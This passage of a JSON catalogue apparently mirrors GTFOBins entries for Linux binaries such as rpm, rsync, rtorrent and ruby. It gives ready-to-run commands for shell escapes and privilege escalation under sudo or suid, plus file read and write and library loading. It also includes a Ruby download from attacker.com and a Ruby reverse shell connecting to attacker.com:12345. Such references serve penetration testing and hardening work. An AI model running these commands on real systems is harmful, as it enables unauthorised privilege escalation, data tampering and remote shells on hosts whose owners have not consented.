output file. This relies on the external `echo` command.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rlwrap/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rlwrap:file-write:0:suid","toolId":"gtfo:rlwrap","toolName":"rlwrap","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"rlwrap -l /path/to/output-file echo DATA","description":"This adds timestamps to the output file. This relies on the external `echo` command.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/rlwrap/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rlwrap:file-write:0:unprivileged","toolId":"gtfo:rlwrap","toolName":"rlwrap","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"rlwrap -l /path/to/output-file echo DATA","description":"This adds timestamps to the output file. This relies on the external `echo` command.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rlwrap/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rlwrap:shell:0:sudo","toolId":"gtfo:rlwrap","toolName":"rlwrap","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"rlwrap /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rlwrap/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rlwrap:shell:0:suid","toolId":"gtfo:rlwrap","toolName":"rlwrap","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"rlwrap /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/rlwrap/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rlwrap:shell:0:unprivileged","toolId":"gtfo:rlwrap","toolName":"rlwrap","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"rlwrap /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rlwrap/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rpm:command:0:sudo","toolId":"gtfo:rpm","toolName":"rpm","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"rpm -ivh x-1.0-1.noarch.rpm","description":"Generate the RPM package with [fpm](https://github.com/jordansissel/fpm) and upload it to the target.\n\n```\necho /path/to/command >x.sh\nfpm -n x -s dir -t rpm -a all --before-install x.sh .\n```","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rpm/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rpm:inherit:0:sudo","toolId":"gtfo:rpm","toolName":"rpm","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:lua"],"command":"rpm --eval '%{lua:...}'","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rpm/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rpm:inherit:0:suid","toolId":"gtfo:rpm","toolName":"rpm","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:lua"],"command":"rpm --eval '%{lua:...}'","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/rpm/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rpm:inherit:0:unprivileged","toolId":"gtfo:rpm","toolName":"rpm","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload"],"nativeCategory":["inherit","from:lua"],"command":"rpm --eval '%{lua:...}'","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rpm/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rpm:shell:0:sudo","toolId":"gtfo:rpm","toolName":"rpm","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"rpm --eval '%(/bin/sh 1>&2)'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rpm/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rpm:shell:0:suid","toolId":"gtfo:rpm","toolName":"rpm","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"rpm --eval '%(/bin/sh 1>&2)'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/rpm/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rpm:shell:0:unprivileged","toolId":"gtfo:rpm","toolName":"rpm","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"rpm --eval '%(/bin/sh 1>&2)'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rpm/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rpm:shell:1:sudo","toolId":"gtfo:rpm","toolName":"rpm","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"rpm --pipe '/bin/sh 0<&1'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rpm/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rpm:shell:1:suid","toolId":"gtfo:rpm","toolName":"rpm","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"rpm --pipe '/bin/sh 0<&1'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/rpm/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rpm:shell:1:unprivileged","toolId":"gtfo:rpm","toolName":"rpm","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"rpm --pipe '/bin/sh 0<&1'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rpm/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rpmdb:inherit:0:sudo","toolId":"gtfo:rpmdb","toolName":"rpmdb","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:lua"],"command":"rpmdb --eval '%{lua:...}'","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rpmdb/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rpmdb:inherit:0:suid","toolId":"gtfo:rpmdb","toolName":"rpmdb","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:lua"],"command":"rpmdb --eval '%{lua:...}'","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/rpmdb/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rpmdb:inherit:0:unprivileged","toolId":"gtfo:rpmdb","toolName":"rpmdb","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload"],"nativeCategory":["inherit","from:lua"],"command":"rpmdb --eval '%{lua:...}'","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rpmdb/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rpmdb:shell:0:sudo","toolId":"gtfo:rpmdb","toolName":"rpmdb","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"rpmdb --eval '%(/bin/sh 1>&2)'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rpmdb/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rpmdb:shell:0:suid","toolId":"gtfo:rpmdb","toolName":"rpmdb","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"rpmdb --eval '%(/bin/sh 1>&2)'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/rpmdb/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rpmdb:shell:0:unprivileged","toolId":"gtfo:rpmdb","toolName":"rpmdb","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"rpmdb --eval '%(/bin/sh 1>&2)'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rpmdb/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rpmquery:inherit:0:sudo","toolId":"gtfo:rpmquery","toolName":"rpmquery","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:lua"],"command":"rpmquery --eval '%{lua:...}'","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rpmquery/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rpmquery:inherit:0:suid","toolId":"gtfo:rpmquery","toolName":"rpmquery","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:lua"],"command":"rpmquery --eval '%{lua:...}'","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/rpmquery/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rpmquery:inherit:0:unprivileged","toolId":"gtfo:rpmquery","toolName":"rpmquery","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload"],"nativeCategory":["inherit","from:lua"],"command":"rpmquery --eval '%{lua:...}'","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rpmquery/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rpmquery:shell:0:sudo","toolId":"gtfo:rpmquery","toolName":"rpmquery","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"rpmquery --eval '%(/bin/sh 1>&2)'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rpmquery/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rpmquery:shell:0:suid","toolId":"gtfo:rpmquery","toolName":"rpmquery","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"rpmquery --eval '%(/bin/sh 1>&2)'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/rpmquery/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rpmquery:shell:0:unprivileged","toolId":"gtfo:rpmquery","toolName":"rpmquery","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"rpmquery --eval '%(/bin/sh 1>&2)'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rpmquery/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rpmverify:inherit:0:sudo","toolId":"gtfo:rpmverify","toolName":"rpmverify","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:lua"],"command":"rpmverify --eval '%{lua:...}'","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rpmverify/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rpmverify:inherit:0:suid","toolId":"gtfo:rpmverify","toolName":"rpmverify","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:lua"],"command":"rpmverify --eval '%{lua:...}'","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/rpmverify/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rpmverify:inherit:0:unprivileged","toolId":"gtfo:rpmverify","toolName":"rpmverify","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload"],"nativeCategory":["inherit","from:lua"],"command":"rpmverify --eval '%{lua:...}'","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rpmverify/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rpmverify:shell:0:sudo","toolId":"gtfo:rpmverify","toolName":"rpmverify","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"rpmverify --eval '%(/bin/sh 1>&2)'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rpmverify/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rpmverify:shell:0:suid","toolId":"gtfo:rpmverify","toolName":"rpmverify","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"rpmverify --eval '%(/bin/sh 1>&2)'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/rpmverify/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rpmverify:shell:0:unprivileged","toolId":"gtfo:rpmverify","toolName":"rpmverify","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"rpmverify --eval '%(/bin/sh 1>&2)'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rpmverify/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rsync:shell:0:sudo","toolId":"gtfo:rsync","toolName":"rsync","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"rsync -e '/bin/sh -c \"/bin/sh 0<&2 1>&2\"' x:x","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rsync/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rsync:shell:0:suid","toolId":"gtfo:rsync","toolName":"rsync","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"rsync -e '/bin/sh -p -c \"/bin/sh -p 0<&2 1>&2\"' x:x","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/rsync/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rsync:shell:0:unprivileged","toolId":"gtfo:rsync","toolName":"rsync","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"rsync -e '/bin/sh -c \"/bin/sh 0<&2 1>&2\"' x:x","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rsync/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rsyslogd:command:0:sudo","toolId":"gtfo:rsyslogd","toolName":"rsyslogd","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"cat >/path/to/temp-file <<EOF\nmodule(load=\"imuxsock\")\n:msg, contains, \"somerandomstring\" ^/path/to/command\nEOF\n\nrsyslogd -f /path/to/temp-file","description":"In order for this to work, one must be able to trigger one event containing the chosen string, e.g., `somerandomstring`. One possibility is to attempt to connect to the victim host via SSH, for example:\n\n```\nssh somerandomstring@victim.com\n```","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rsyslogd/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rtorrent:shell:0:sudo","toolId":"gtfo:rtorrent","toolName":"rtorrent","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo 'execute = /bin/sh,-c,\"/bin/sh </dev/tty >/dev/tty 2>/dev/tty\"' >~/.rtorrent.rc\nrtorrent","description":"After the shell, exit with `Ctrl-Q`.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rtorrent/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rtorrent:shell:0:suid","toolId":"gtfo:rtorrent","toolName":"rtorrent","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo 'execute = /bin/sh,-p,-c,\"/bin/sh -p </dev/tty >/dev/tty 2>/dev/tty\"' >~/.rtorrent.rc\nrtorrent","description":"After the shell, exit with `Ctrl-Q`.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/rtorrent/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rtorrent:shell:0:unprivileged","toolId":"gtfo:rtorrent","toolName":"rtorrent","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo 'execute = /bin/sh,-c,\"/bin/sh </dev/tty >/dev/tty 2>/dev/tty\"' >~/.rtorrent.rc\nrtorrent","description":"After the shell, exit with `Ctrl-Q`.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rtorrent/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ruby:download:0:sudo","toolId":"gtfo:ruby","toolName":"ruby","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"ruby -e 'require \"open-uri\"; download = URI.open(\"http://attacker.com/path/to/input-file\"); IO.copy_stream(download, \"/path/to/output-file\")'","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ruby/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ruby:download:0:unprivileged","toolId":"gtfo:ruby","toolName":"ruby","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"ruby -e 'require \"open-uri\"; download = URI.open(\"http://attacker.com/path/to/input-file\"); IO.copy_stream(download, \"/path/to/output-file\")'","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ruby/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ruby:file-read:0:sudo","toolId":"gtfo:ruby","toolName":"ruby","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ruby -e 'puts File.read(\"/path/to/input-file\")'","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ruby/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ruby:file-read:0:unprivileged","toolId":"gtfo:ruby","toolName":"ruby","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"ruby -e 'puts File.read(\"/path/to/input-file\")'","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ruby/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ruby:file-write:0:sudo","toolId":"gtfo:ruby","toolName":"ruby","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"ruby -e 'File.open(\"/path/to/output-file\", \"w+\") { |f| f.write(\"DATA\") }'","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ruby/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ruby:file-write:0:unprivileged","toolId":"gtfo:ruby","toolName":"ruby","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"ruby -e 'File.open(\"/path/to/output-file\", \"w+\") { |f| f.write(\"DATA\") }'","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ruby/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ruby:library-load:0:sudo","toolId":"gtfo:ruby","toolName":"ruby","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"ruby -e 'require \"fiddle\"; Fiddle.dlopen(\"/path/to/lib.so\")'","mitre":["T1574"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ruby/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ruby:library-load:0:unprivileged","toolId":"gtfo:ruby","toolName":"ruby","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load"],"nativeCategory":["library-load"],"command":"ruby -e 'require \"fiddle\"; Fiddle.dlopen(\"/path/to/lib.so\")'","mitre":["T1574"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ruby/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ruby:reverse-shell:0:sudo","toolId":"gtfo:ruby","toolName":"ruby","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"ruby -rsocket -e 'exit if fork;c=TCPSocket.new(\"attacker.com\",12345);while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ruby/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution 